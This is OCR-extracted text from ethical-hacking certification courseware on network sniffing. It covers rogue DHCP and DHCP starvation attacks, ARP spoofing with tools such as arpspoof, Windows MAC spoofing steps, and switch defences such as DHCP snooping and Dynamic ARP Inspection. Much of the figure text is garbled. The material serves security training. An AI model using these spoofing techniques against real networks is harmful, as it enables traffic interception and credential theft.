rogue server can respond to clients’ DHCP discovery requests. Although both the rogue and actual DHCP servers respond to the request, the client accepts the response that comes first. In the case where the rogue server responds earlier than the actual DHCP server, the client takes the response of the rogue server. The information provided to the clients by this rogue server can disrupt their network access, causing a DoS attack. The DHCP response from the attacker’s rogue DHCP server may assign the IP address that serves as a client’s default gateway. As a result, the attacker’s IP address receives all the traffic from the client. The attacker then captures all the traffic and forwards it to the appropriate default gateway. The client thinks that everything is functioning correctly. This type of attack is difficult for the client to detect for long periods. Sometimes, the client uses a rogue DHCP server instead of the standard one. The rogue server directs the client to visit fake websites in an attempt to gain their credentials.

Module 08 Page 1248

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

To mitigate a rogue DHCP server attack, set the connection between the interface and the rogue server as untrusted. This action will block all incoming DHCP server messages from that interface.

4

°

|

DHCP Server User IP Address: 10.0.0.20

i

Subnet Mask: 255.255.255.0 Default Routers: 10.0.0-1

H

i i

Meise. sense Tine: 2 Gaye

SS

Internet

By running a rough DHCP server, an attacker can send incorrect TCP/IP setting

‘Wrong Default Gateway > Attacker is the gateway

i

Wrong DNS server- Attacker is the DNS server ‘Wrong IP Address > DoS with spoofed IP

Rogue Server

Figure 8.29: Rogue DHCP server attack

DHCP Attack Tools Some additional DHCP attack tools are listed below: =

mitm6 (https://github.com)

=

DHCPwn (https://github.com)

=

DHCPig (https://github.com)

Module 08 Page 1249

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Sniffing

How to Defend Against DHCP Starvation and Rogue Server Attacks @ Enable port securityto defend against DHCP starvation

@

Enable DHCP snooping, which allows the switch to accept a DHCP transaction directed from a trusted port

attacks

© Configuring the MAC limit on the switch’s edge ports drops the packets from further MACs once the limit is reached

x

[8] 10S Switch Commands switchport port-security switchport port-security switchport port-security switchport port-security switchport port-security switchport port-security

DHCP Snooping Enabled

DHcP

——2

cE H Pood both

A

ze

Trusted toes

united

unites]

£&

Attacker

User

10S Global Commands |@ 4p dhep snooping ~this turnson DHCP snooping |@ ip dhep snooping vlan 4,104 ~ this configures VLANs to snoop |@ ip dhep snooping trust ~this configures interface as trusted Note: All po in the VLANare not trusted by default

maximum 1 ation restrict aging time 2 aging type inactivity mac-address sticky

How to Defend Against DHCP Starvation and Rogue Server Attacks (Cont'd) MAC Limiting Configuration on Juniper Switches @ set interface ge-0/0/1 mac-limit 3 action drop

@ set interface ge-0/0/2 mac-limit 3 action drop

@ show interface ge-0/0/1.0 { mac-limit 3 action drop; }

interface ge-0/0/2.0 { mac-limit 3 action drop; }

|@ show ethernet-switching table

DACP

cE H

|

Configuring DHCP Filtering on a Switch @

Enable DHCP filtering for the switch:

config dhep filter exit exit Enable DHCP filtering for an interface: config interface 0/11 dhep filter trust exit exit Show the DHCP filtering configuration: show dhcp filtering Al Rights Reserved. Reproduction i

How to Defend Against DHCP Starvation and Rogue Server Attacks Defend Against DHCP Starvation Enable port security to defend against a DHCP starvation attack. Port security limits the maximum number of MAC addresses on the switch port. When the limit is exceeded, the switch drops subsequent MAC address requests (packets) from external sources, which safeguards the server against a DHCP starvation attack. Module 08 Page 1250

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

Attacker

User

Figure 8.30: Defending against a DHCP starvation attack

Internetwork Operating System (IOS) Switch Commands Source: https://www.cisco.com =

switchport

port-security

The switchport port-security to enable port security. ="

switchport

port-security

command

maximum

configures the switch port parameters

1

The switchport port-security maximum number of secure MAC addresses for the port.

command

The switchport port-security maximum 1 command number of secure MAC addresses for the port as 1. =

switchport

port-security

violation

configures

the

maximum

configures the maximum

restrict

The switchport port-security violation command sets the violation and the necessary action in case of detection of a security violation.

mode

The switchport port-security violation restrict command drops packets with unknown source addresses until a sufficient number of secure MAC addresses are removed. ="

switchport

port-security

aging

The switchport port-security MAC address aging time on the port. The switchport 2 minutes. ="

switchport

port-security

port-security

Module 08 Page 1251

aging aging

aging

The switchport port-security MAC address aging type on the port.

time

2

time time

type

aging

command

configures the secure

2 command sets the aging time as

inactivity

type

command

configures the secure

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

The switchport port-security aging type as inactivity aging. =

switchport

port-security

This command enables address sticky keywords. MAC addresses that are these addresses to sticky

aging

type

mac-address

inactivity

command

sets the

sticky

sticky learning on the interface by entering only the MACWhen sticky learning is enabled, the interface adds all secure dynamically learned to the running configuration and converts secure MAC addresses.

Defend Against Rogue Server Attack The DHCP snooping feature that is available on switches can mitigate against rogue DHCP servers. It is configured on the port on which the valid DHCP server is connected. Once configured, DHCP snooping does not allow other ports on the switch to respond to DHCP Discover packets sent by clients. Thus, even an attacker who manages to build a rogue DHCP server and connects to the switch cannot respond to DHCP Discover packets. DHCP Snooping

Enabled

> :

IP ID: 10.10.10.1

MAC: 00-14-20-01-23-45

:

:

ARP_REQUEST

Hello, | need the MAC address of 10.10.10.3

ee IP 1D: 10.10.10.2 MAC: 00-14-20-01-23-46

IP ID: 194.54.67.10

MAC: 00:1b:48:64:42:e4

AA

ARP_REQUEST

eee =

ARP_REPLY | am 10.10.10.3.

eee ees

03

MAC address is 00-14-20-01-23-47

Prererr reer rer rrr rerirerr errr rrriirsy

Connection Established

>

IP ID: 10.10.10.3

MAC: 00-14-20-01-23-47

Figure 8.32: Working of ARP protocol

Consider an ARP example that shows two machines connected hostnames, IPs, and MAC addresses are: HostName

IP

in a network. The respective

MAC

A

194.54.67.10

00:1b:48:64:42:e4

B

192.54.67.15

00-14-20-01-23-47

Before communicating with host B, host A first checks for a record of host B’s MAC address in the ARP cache. If host A finds the record of a MAC address, it communicates directly with host B. Otherwise, it has to access host B’s MAC address using ARP protocol. Host A queries all the hosts on the LAN. If the query were phrased in plain English, it might sound like this: “Hello, who is 192.54.67.15? This is 194.54.67.10. My MAC address is 00:1b:48:64:42:e4. | need your MAC address.” Here, host A sends a broadcast request data packet to host B. On receiving the ARP request packet, host B updates its ARP cache table with host A’s IP and MAC addresses, and sends an Module 08 Page 1256

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

ARP reply packet to host A that would be phrased in English as, “Hey, this is 192.54.67.15; my MAC address is 00-14-20-01-23-47.” On receiving the ARP reply, host A updates its ARP cache table with host B’s IP and MAC addresses. After establishing a connection, these two hosts can communicate with each other.

-

BH Command Prompt

o

x

Figure 8.33: ARP cache

ARP Spoofing Attack ARP resolves IP addresses to the MAC (hardware) address of the interface to send data. ARP packets can be forged to send data to the attacker’s machine. ARP spoofing involves constructing a large number of forged ARP request and reply packets to overload a switch. When a machine sends an ARP request, it assumes that the ARP reply will come from the right machine. ARP provides no means of verifying the authenticity of the responding device. Even systems that have not made an ARP request can accept the ARP replies coming from other devices. Attackers use this flaw in ARP to create malformed ARP replies containing spoofed IP and MAC addresses. Assuming it to be the legitimate ARP reply, the victim’s computer blindly accepts the ARP entry into its ARP table. Once the ARP table is flooded with spoofed ARP replies, the switch is set in forwarding mode, and the attacker intercepts all the data that flows from the victim’s machine without the victim being aware of the attack. Attackers flood a target computer’s ARP cache with forged entries, which is also known as poisoning. ARP spoofing is an intermediary for performing attacks such as DoS, MITM, and session hijacking. How does ARP Spoofing Work? ARP spoofing is a method of attacking an Ethernet LAN. When a legitimate user initiates a session with another user in the same layer 2 broadcast domain, the switch broadcasts an ARP request using the recipient's IP address, while the sender waits for the recipient to respond with a MAC address. An attacker eavesdropping on this unprotected layer 2 broadcast domain can respond to the broadcast ARP request and replies to the sender by spoofing the intended recipient’s IP address. The attacker runs a sniffer and turns the machine’s NIC adapter to promiscuous mode. ARP spoofing is a method of attacking an Ethernet LAN. It succeeds by changing the IP address of the attacker’s computer to that of the target computer. A forged ARP request and reply

Module 08 Page 1257

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

packet can find a place in the target ARP cache in this process. As the ARP reply has been forged, the destination computer (target) sends frames to the attacker’s computer, where the attacker can modify the frames before sending them to the source machine (User A) in an MITM attack. The attacker can also launch a DoS attack by associating a non-existent MAC address to the IP address of the gateway; alternatively, the attacker may sniff the traffic passively and then forward it to the target destination. Yes, lam here

Poisoned ARP cache

pee | I want to connectto 10.1.1.1, but Ineed a MACaddress

Ns SS o

10.1.1.0 10.1.1.1

21-56-88-99-55-66 11-22-33-44-55-66

10.1.1.2

55-88-66-55-33-44

Sends ARP request 7 (>y > eben >




responds to the ARP request Vi

e

Sends his malicious e MAC address H 1am 10.1.1.1and

my MAC address is

deeeeeey >

: ! Malicious user eavesdrops on t the ARP request and t responses and spoofs as the legitimate user

Geecees >

:

Vv

A

ii User D

v

11-22-33-44-55-66

xX

Information for IP address

10.1.1.1is now being sent to

MAC address 11-22-33-44-55-66

@

Attacker

el

Figure 8.34: Working of an ARP spoofing attack

Module 08 Page 1258

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

Threats of ARP Poisoning ‘|@

Using fake ARP messages, an attacker can divert all communications between two machines, resulting in all

traffic being exchanged via the attacker’s PC

1 |

Packet Sniffing

| 6 |

Data Interception

|| 2 |

Session Hijacking

1\[ | 7 |

Connection Hijacking

]

| Hi

VoIP Call Tapping

] | | ls

Connection Resetting

]

[| 4 |

Manipulating Data

lI] | 9 |

Stealing Passwords

|

[ is |

Man-in-the-Middle Attack

]

Denial-of-Service (DoS) Attack

|

|

| 10 |

hts Reserved. Reproduction

Threats of ARP Poisoning With the help of ARP poisoning, an attacker can use fake ARP messages to divert communications between two machines so that all traffic redirects via the attacker’s PC.

all

The threats of ARP poisoning include: =

Packet Sniffing: Sniffs traffic over

=

Session Hijacking: Steals valid session access to an application.

=

VoIP Call Tapping: Uses port mirroring, which allows the VoIP call tapping unit to monitor all network traffic, and picks only the VoIP traffic to record by MAC address.

=

Manipulating Data: ARP spoofing allows attackers to capture and modify data, or stops the flow of traffic.

=

Man-in-the-Middle Attack: An between the victim and server.

=

Data Interception: Intercepts IP addresses, MAC addresses, and VLANs connected to the switch in a network.

=

Connection Hijacking: In a network, the hardware addresses are supposed to be unique and fixed, but a host may move when its hostname changes and use another protocol. In connection hijacking, an attacker can manipulate a client’s connection to take complete control.

=

Connection Resetting: The wrong routing information could be transmitted due to a hardware/software error. In such cases, if a host fails to initiate a connection, that host

Module 08 Page 1259

a network or a part of the network.

attacker

information

performs

and

uses it to gain unauthorized

a MITM

attack where

they

reside

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

should inform the Address Resolution module to delete its information. The reception of data from that host will reset a connection timeout in the ARP entry used to transmit data to that host. This entry in the ARP module is deleted if the host does not send any information for a certain period of time. =

Stealing Passwords: An attacker uses forged ARP replies and tricks target hosts into sending sensitive information such as usernames and passwords.

=

DoS Attack: Links multiple IP addresses with a single MAC address of the target host that is intended for different IP addresses, which will be overloaded with a huge amount of traffic.

Module 08 Page 1260

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

CEH

redirects packets from a target host (or all hosts) on the LAN arpspoof | arpspoof PSP that are intended for another host on the LAN by forging ARP replies

ie

ARP Poisoning Tools

ipsum bettercop.crg Ettercap eeps:/ a ettercop-prject.org

the attackerssystem

‘tesa

BetterCAP

net

Haba Habu is a hacking toolkit

mitwt

‘etps://atub com

that provides various

commands to perform ARP poisoning, sniffing, DHCP

Vi LOS

starvation, etc.

Arpoison

tepseestrsenet

https//ethub com

ARP Poisoning Tools =

arpspoof Source: https://linux.die.net arpspoof redirects packets from a target host (or all hosts) on the LAN that are intended for another host on the LAN by forging ARP replies. This is an extremely effective way of sniffing traffic on a switch. Syntax: arpspoof

-i

[Interface]

-t

[Target

Host]

As shown in the screenshot, attackers use the arpspoof tool to obtain the ARP cache; then, the MAC address is replaced with that of an attacker’s system. Therefore, any traffic flowing from the victim to the gateway will be redirected to the attacker’s

system.

Further, an attacker can issue the same command and can send ARP replies in both directions.

Module 08 Page 1261

in reverse as he/she is in the middle

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

address is replaced with that of the attacker's system

Figure 8.35: Screenshots of arpspoof

=

Habu

Source: https://github.com Habu is a hacking toolkit that provides various commands attacks: o

ARP poisoning and sniffing

o

DHCP discovery and starvation

o

Subdomain identification

o.

Certificate cloning

oO

TCP analysis (ISN, flags)

o

Username check on social networks

o

Web technology identification

Module 08 Page 1262

to perform

the following

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Sniffing

Figure 8.36: Screenshot of Habu

Some examples of ARP poisoning tools are listed below:

BetterCAP (https://www.bettercap.org) Ettercap (https://www.ettercap-project.org) dsniff (https://www.monkey.org) MITMf (https://github.com)

Arpoison (https://sourceforge.net)

Module 08 Page 1263

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

How to Defend Against ARP Poisoning |

CE H

Implement Dynamic ARP Inspection Using DHCP Snooping Binding Table sh ip dhep snooping binding

Macddress ta:12:3b:2¢;d£:1¢

IpAdiress 10.10.10.8

Lease 125864

Type ‘VIAN —_—sInterface dhep-_ «= &—sFastthernet3/18 snooping

A

DHCP Snooping Enabled | Dynamic ARP Inspection Enabled ,

10.10.10.2 MACB

10.10.10.1 MAC A

|

No ARP entry in the binding table then discard the packet

10.10.10.5 MAC C

How to Defend Against ARP Poisoning Implementation of Dynamic ARP Inspection (DAI) prevents poisoning attacks. DAI is a security feature that validates ARP packets in a network. When

DAI activates on a VLAN, all ports on the

VLAN are considered to be untrusted by default. DAI validates the ARP packets using a DHCP snooping binding table. The DHCP snooping binding table consists of MAC addresses, IP addresses, and VLAN interfaces acquired by listening to DHCP message exchanges. Hence, you must enable DHCP snooping before enabling DAI. Otherwise, establishing a connection between VLAN devices based on ARP is not possible. Consequently, a self-imposed DoS may result on any device in that VLAN.

To validate the ARP packet, the DAI performs IP-address-to-MAC-address binding inspection stored in the DHCP snooping database before forwarding the packet to its destination. If any invalid IP address binds a MAC address, the DAI will discard the ARP packet. This eliminates the risk of MITM attacks. DAI ensures the relay of only valid ARP requests and responses. If the host systems in a network hold static IP addresses, DHCP snooping will not be possible, or other switches in the network cannot run dynamic ARP inspection. In such situations, you have to perform static mapping that associates an IP address to a MAC address on a VLAN to prevent

an ARP poisoning attack.

Software can be implemented that runs custom scripts compare the current ARP table to the list of known mismatch in the list of valid MAC/IP pairs, the switch helpful in defending against ARP poisoning attacks important LAN machines such as servers and gateways.

Module 08 Page 1264

to monitor ARP tables. This script can MAC and IP addresses. If there is a will drop the packet. Such scripts are by monitoring the MAC/IP pairs on

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

The implementation of cryptographic protocols such as HTTP Secure (HTTPS), Secure Shell (SSH), Transport Layer Security (TLS), and various other networking cryptographic protocols prevents ARP spoofing attacks by encrypting data before transmission and authenticating it after it is received. sh ip dhcp snooping binding MacAddress

Lasl2:3b:2£;df:1e

IpAddress

10.10.10.8

Lease

Type

125864 — dhep-

snooping

VLAN

4

Interface

10.10.10.1

FastEthernet3/18

MACA

DHCP Snooping Enable Dynamic ARP Inspection Enable

[No ARP entry in the | binding table then \_ discard the packet _|

ARP 10.10.10.1 Saying 10.10.10.2 is MACC 10.10.10.2 MACB

ARP 10.10.10.2

Saying 10.10.10.1

is MACC

|

10.10.10.5

Macc

Check the MAC and IP fields to see if the ARP from the interface is in the bindit not, traffic is blocked

Figure 8.37: Defending against ARP poisoning

Module 08 Page 1265

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

Configuring DHCP Snooping and Dynamic ARP Inspection on Cisco Switches

yas mown

1]

4p dhep snooping vlan 10 “2 show ip dhep snooping ping is enabled nfigured on erational on fol configured on the follo

C IE H Pood both

Svight 72 on oman

4# show ip arp inspection

g trust/rate is configured on the following

la:i2:3b:2£;de:1¢ 10.10.10.8 125864 Total number of bindings: 1

@-FastEthernet 0/3

dhopsnooping

Strictly Prohibited

Configuring DHCP Snooping and Dynamic ARP Inspection on Cisco Switches As discussed, feature that messages. A segment and

DHCP snooping must be enabled before enabling DAI. DHCP snooping is a security builds and maintains a DHCP snooping binding table and filters untrusted DHCP Cisco switch with DHCP snooping enabled can inspect DHCP traffic flow at a layer 2 track IP addresses to switch port mapping.

To configure DHCP snooping on a Cisco switch, ensure DHCP snooping is enabled both globally and per access VLAN. To enable DHCP snooping, execute the following commands: Configuring DHCP snooping in global configuration mode Switch (config)#

ip

dhcp

snooping

Configuring DHCP snooping for a VLAN Switch

(config)#

Switch

(config)

ip

#

dhcp

snooping

vlan

10

*Z

To view the DHCP snooping status Switch# Switch

show DHCP

ip

dhcp

snooping

snooping is

enabled

DHCP

snooping

is

configured

DHCP

snooping

is

operational

DHCP

snooping

is

configured

DHCP

snooping

trust/rate

Interface

Module 08 Page 1266

is

Trusted

on on on

following

VLANs:

following the

VLANs:

following

configured Rate

on

limit

10

L3

the

10 Interfaces:

following

Interfaces:

(pps)

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

If the switch is functioning only at layer 2, apply the ip dhcp snooping trust command to the layer 2 interfaces to designate uplink interfaces as trusted interfaces. This informs the switch that DHCP responses can arrive on those interfaces. The DHCP snooping binding table contains the trusted DHCP clients and their respective addresses. To view the DHCP snooping table, you have to execute the following command: Switch

(config)

#

show

ip

dhcp

snooping

IP

binding

This displays the DHCP snooping table, which contains the MAC addresses, respective IP addresses, and total number of bindings. The following is an example of a DHCP snooping binding table: MAC

Address

IP

1a:12:3b:2£;df:1c Total

number

of

Address

Lease

10.10.10.8 bindings:

(sec)

Type

125864

VLAN

dhcp-snooping

Interface

4

FastEthernet0/3

1

After establishing a DHCP snooping binding table, the user can start configuring DAI for the VLAN. To enable DAI for multiple VLANs, specify a range of VLAN numbers. Command to configure ARP inspection for a VLAN Switch

(config)#

Switch

(config)

ip

#

arp

inspection

vlan

10

*Z

Command to configure ARP inspection for a range of VLANs Switch

(config)#

ip

arp

inspection

vlan

10,

11,

Switch (config)#

ip

arp

inspection

vlan

10-13

12,

13

Or To view the ARP inspection status Switch

Source

(config)#

Mac

Address

Vlan

10 Vlan

10

ip

Mac

Validation

Enabled

Disabled

:

Disabled

:

Disabled ACL

Logging

DHCP

Logging

Deny

10

t)

()

10

Permits

ACL

() Dest

Probe

DHCP

Drops

ACL

Logging

MAC

(}

Failures

ACL

0 Permits IP

Drops

(e) Probe

0

10

Static

Off Dropped

DHCP

Match

Active

Forwarded

Vlan

:

Operation

Vlan

Vlan

inspection

Validation

Configuration ACL

arp

Validation

Destination IP

show

Permits

Source

() Validation

0

MAC

Failures

(}

Failures

Invalid

Protocol

Data

t)

From this IP ARP inspection result, it is clear that the source MAC, destination MAC, and IP address are disabled. Even more security can be attained by enabling one or more of these

Module 08 Page 1267

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

additional validation checks. To do so, validate followed by the address type.

execute

the

command

ip

arp

inspection

Assume that an attacker with the source IP address 192.168.10.1 connects to VLAN 10 on interface FastEthernet0/5 and sends ARP replies, pretending to be the default router for the subnet in an attempt to initiate an MITM attack. The switch with DAI enabled inspects these reply packets by comparing them with the DHCP snooping table. The switch then tries to find an entry for the source IP address 192.168.10.1 on port FastEthernet0/5. If there is no entry, then the switch discards these packets. %SW_DAI-4-DHCP_SNOOPING DENY:

1

Invalid

ARPs

(Res)

on

Fa0/5,

vlan

([0013.6050.acf4/192.168.10.1/£ff£.£f££.£f££/192.168.10.1/05:37:31 APR 12 2022])

10

UTC

Tue

If the discarding of packets starts, then the drop count begins to increase. You can see this increase in the drop count in the DAI output. To see the output, execute the command show ip

arp

inspection

Switch

Source

(config)#

Mac

Address

Mac

Validation:

Configuration

10

Enabled

Vlan

ACL

Vlan

arp

Logging

10

30

10

30

Module 08 Page 1268

Disabled

Disabled

Operation

ACL

Match

Static

ACL

Active DHCP

Deny

Forwarded

inspection

Disabled

Validation:

Vlan

10

ip

Validation:

Destination IP

show

Logging

Probe

Deny

Dropped

Logging

Off

DHCP

5

Drops

5

()

ie)

ACL

Drops

(e)

(0)

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

Capsa Portable Network Analyzer Ithelps security professionals in quickly detecting ARP poisoning and ARP flooding attacksand in locating the attack source

|

iatreiare anette ree Pat OO (PP) A: F-S Ce wo & 2 [omisarseron rackets

te

ARP Spoofing Detection Tools

x

Wireshark etps://ucwireshork.org

CD

ArpON

2

ARP AntiSpoofer

LQ.

ee hetas://sourceforge.net

ARPStraw ‘tps:/atub.com shARP ‘tps:/ att.com

ARP Spoofing Detection Tools =

Capsa Portable Network Analyzer

Source: https://www.colasoft.com Capsa, a portable network performance analysis and diagnostics tool, provides packet capture and analysis capabilities with an easy-to-use interface, allowing users to protect and monitor networks in a critical business environment. It helps security professionals in quickly detecting ARP poisoning and ARP flooding attacks and in locating the attack

source.

Module 08 Page 1269

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

o_arp_attack File

Edit

Exam 312-50 Certified Ethical Hacker

- Colasoft

View

Project

Capsa

Tools

[Stopped] - 00:13:8F:6B:7D:99

Window

5

Help

OeP&8\|0. 0.4/0 0| » FF & & 8 a a New Open Save Back ” Food Up Start_Sicp Settings Adepter Fier Network Log Diagnosis Name Table Filter Table Opt 4 > _/ Summary |Diagnosis | Endpoints |Pratocols | Conversations | Matrix Packets |Logs Graphs | Reports B) Explorer 2

ono

#100

C)

WD

4

4 WD @.

a

-23{\6? Tell 21.36.23...

238077 Tell 21.36.23...

1299.8? Tell 21.96.23...

co.ts.sees oost1:s0:6¢4


Networking and Sharing Center

In Windows 11 OS

Method 1: Ifthe network interface card supports a clone MAC address, then follow these steps:

@

x

In the Ethernet Properties window, click on the Configure button and then click on the Advanced tab

SBS

Microsoft Hyper-V Newerk Adapter Properties overt [Free] Onver Dette Evers “Thefolong avalible fr ta adetnaen elect adapter. Cleae {heone pepey youpopate warts aechange on tel,

Click on Ethernet and then click on Propertiesin the Ethernet Status window

Under the “Property” section, browse for Network Address and click on it

On the right side, under “Value,” type in the new MAC address you would like to assign and click OK Note: Enter the MAC address number without a “:” between the number pairs Type “ipconfig/all” or “net config rdr” in the command promptto verify the changes If the changes are visible then reboot the system, otherwise try method 2 (change MAC address in the registry)

MAC

Spoofing Technique: Windows

CEH

(Cont’d)

| Method 2: Steps to change the MAC address in the Registry | @ Press Win+ Rto open Run, type regedit tostartthe registry editor Goto “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\c ontrol\Class \{4d36e972-e325-11.ce-bfc1(08002be10318} and double click on it to expand the tree | 4-digit sub keys representing network adapters will be displayed (starting with 0000, 0001, 0002, etc.) @ Search for the proper “DriverDesc” key tofind the desired interface @ Right-click on the appropriatesub key and add, new string value "NetworkAddress” (data type"REG_SZ") to contain the new MAC address @ Right click on the “NetworkAddress” string value on the right side and select Modify... @ Inthe “Edit String” dialogue box, “Value data” field enter the new MAC address and click “OK” @ Disable and then re-enable the network interface that was changed or reboot the system

(ec er ET vou neuen iwnccomnaa cotaras ncrcecamnenra BS5 (ears ewes) a Stem pprromaeanect) (era eee Nee et (eb ery

aDNe))

©mz az xox no oschectom RES orenecaon HEE aap RES howe FEGOWORD

(Udi eee ames SOD) B toesrars Neem B aarsazs eee mes S taer osetctahe 8 B taea teoean arsse eeecs ame8 Bene as eee ast) 1B teneereos eee be tener eres)

oo naz HOS nos

:

3a ocr

Meret tise ae

MAC Spoofing Technique: Windows There are two methods for MAC spoofing in Windows 11 OS: Method 1: If the network interface card supports clone MAC address, then follow these steps: 1.

Click on Start, search for Control Panel and open Internet > Networking and Sharing Center.

Module 08 Page 1273

it, then

navigate to Network and

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

2.

Click on Ethernet and then click on Properties in the Ethernet Status window.

3.

In the Ethernet Advanced tab.

4.

Under the “Property” section, browse for Network Address and click on it.

5.

On the right-hand side, under “Value,” type in the new MAC address you would like to assign and click OK.

Properties window,

click on the Configure

button

and

then

on the

Note: Enter the MAC address number without “:” in between. 6.

Type “ipconfig/all” or “net config rdr” in the command prompt to verify the changes.

7.

If the changes are visible, then reboot the system, or else try method 2 (change MAC address in the registry). Microsoft Hyper-V Network Adapter Properties

General

Driver

Details

Events

The following properties are available for this network adapter. Click

the property you want to change on the left, and then select its value

‘on the right

Property:

Value:

Forwarding Optimization

Hyper-V Network Adapter Name

Q00A959D6816

IPSec Offload IPv4 Checksum Offload Jumbo Packet

Large Send Offload Version 2 (IPvs

Large Send Offload Version 2 (IPvt Max Number of RSS Processors Maximum Numberof RSS Queues Maximum RSS Processor Number

‘Network Direct (ROMA) Packet Direct | Receive Buffer Size

Cancel

Figure 8.40: Ethernet Properties dialog box

Module 08 Page 1274

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Sniffing

Method 2: Steps to change the MAC address in the registry: 1.

Press Win + R to open Run, and type regedit to start the registry editor.

2.

Go to "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4d36e972e325-11ce-bfc1-08002be10318} and double-click on it to expand the tree.

3.

Four-digit sub keys representing network adapters will be found

0001, 0002, etc.).

(starting with 0000,

4.

Search for the proper “DriverDesc” key to find the desired interface.

5.

Right-click on the appropriate sub key and add the new string value “NetworkAddress” (data type “REG_SZ”) to contain the new MAC address.

6.

Right-click on the “NetworkAddress” string value on the right side and select Modify...

7.

Now, in the “Edit String” dialog box, enter the new MAC address in the “Value data” field and click “OK.”

8.

Disable and then

re-enable

the network

interface that was

changed,

or reboot the

system.

Name 28) -ReclPvd 28) ReclPv6 ab)-RSS at) ResBaseProcNu...

ype REG.Sz REG Sz REG Sz REG SZ REG.SZ

36e96-325-11ce-fet-0e00dbet0318) f1-os002be10316) ||| 28)*7CPChecksum..

REG_SZ

(Ldedo-e325-T ce be-80026e10318) dSedb-25- eer -0002be 1318) e25 -noaseosie) || A) RsBareProcNa. teeter De asesec bfc1-08002be10318} —— (4d36€96d-€325-11ce——REG.SZ *)"SSProecksum... REG_SZ oeneaber0ste) |||||| *2)"TCPChe tee bet-e2SLdSbedte e-bfc1-08002be10318) | || 28)*UDPChecksum....

REG_SZ

1’

j / : 3 3

3 e-bfc1-08002be10318) || #8)*UOPChecksum... REG SZ x0 REG SZ 2)BusType 8lchacacterstics_REG_DWORD 00000008 (4) VMBUS\(f8615163-dfBe-d6c5-9131-(242/965edDe) REG_SZ s8)Componentid MBUS\((9615163-af3e-d6c5-9131-1242965edDeN )DeviceinstancelO REG_SZ 6-21-2006 REG SZ 2)DrverDate 00 808¢ a3 594 e601 32)DriveDateData_ REG BINARY a DrverDese REG_SZ ‘Microsoft Hyper. Network Adapter 10022000434 REG_SZ = Drverversion ° )ForwardingOpti... REGSZ " ai) Hype Network. REG.SZ | Fae sting > = ye —_REG_DWK B2lifypePreStat oaecia oe cows 22)infPath REG_SZ_Vabe nane: enim 2)InfSection REG SZ NetwonkAdeeae 318) || HlnstalTimestamp —REG_BINF (44360873-€325-11ce-bfct-08002be10 f1.08002be10318) || 28) MatchingDeviceld REG_SZ f1.08002be10316) || *2)NetCfglnstanceld REG_SZ Coneel (1-08002be10316) || 3NetLuidindex __REG. DW ‘ (4d36e978-€325-11ce-bfcl-08002be10318) (1481357738060 (132877455328305375) (44360879-€325-11ce-bfct-08002be10318) || B2|Networkinterfa... REG_QWORD Microsoft —_-REG_SZ ‘Dil {4436¢97b-€325-11ce-bfc1-08002be10318) || #8)ProviderName 8192 (4d360974-e325-N1ce-bfe1-08002be10318} || ab) ReceiveBufferSze REG SZ 1028 (4d36e87e-e325-11ce-bfcT-O8002be10318} || st)sendBufferSze _REG_SZ ° REG Sz 2)Vlaio = = 